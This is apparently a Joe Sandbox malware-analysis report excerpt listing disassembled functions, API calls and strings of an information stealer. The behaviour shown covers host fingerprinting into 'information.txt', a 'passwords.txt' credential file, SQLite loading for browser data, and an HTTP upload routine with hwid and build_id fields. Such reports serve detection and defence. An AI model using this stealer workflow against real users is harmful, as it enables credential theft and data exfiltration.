Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Local Time: , xrefs: 0041414B
Processor: , xrefs: 0041422D
[Processes], xrefs: 0041442A
Display Resolution: , xrefs: 0041406F
TimeZone: , xrefs: 004141AC
Path: , xrefs: 00413DBB
Computer Name: , xrefs: 00413FAD
RAM: , xrefs: 00414350
Windows: , xrefs: 00413E70
AV: , xrefs: 00413F3E
Cores: , xrefs: 0041428E
GUID: , xrefs: 00413CE1
Keyboard Languages: , xrefs: 004140DE
[Software], xrefs: 004144A3
Install Date: , xrefs: 00413ED1
[Hardware], xrefs: 0041420D
VideoCard: , xrefs: 004143B7
User Name: , xrefs: 0041400E
information.txt, xrefs: 00414573
Threads: , xrefs: 004142EF
HWID: , xrefs: 00413D4E
Date: , xrefs: 00413C1F
Version: , xrefs: 00413B9F
Work Dir: In memory, xrefs: 00413E30
MachineID: , xrefs: 00413C80

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3279995179-1014693891
Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
Sleep.KERNEL32(0000EA60), ref: 00416BFF

Strings

sqlp.dll, xrefs: 00416CFE
ERROR, xrefs: 00416AF1
ERROR, xrefs: 00416BD6
ERROR, xrefs: 00416BE8
ERROR, xrefs: 00416BC0
sqlite3.dll, xrefs: 00416C9C
sqlp.dll, xrefs: 00416CCD
ERROR, xrefs: 00416A98
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CDF
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CAE
.vA, xrefs: 00416D1D
ERROR, xrefs: 00416B51
sqlite3.dll, xrefs: 00416C68
ERROR, xrefs: 00416BAA

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-4129404369
Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404C75
", xrefs: 00404ED9
------, xrefs: 00404DFB
hwid, xrefs: 00404EAD
build_id, xrefs: 0040500D
8wA, xrefs: 00405222
------, xrefs: 00404F5B
", xrefs: 00405039

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 3006978581-858375883
Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

delays.tmp, xrefs: 004016A4
%s%s, xrefs: 004016B6

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

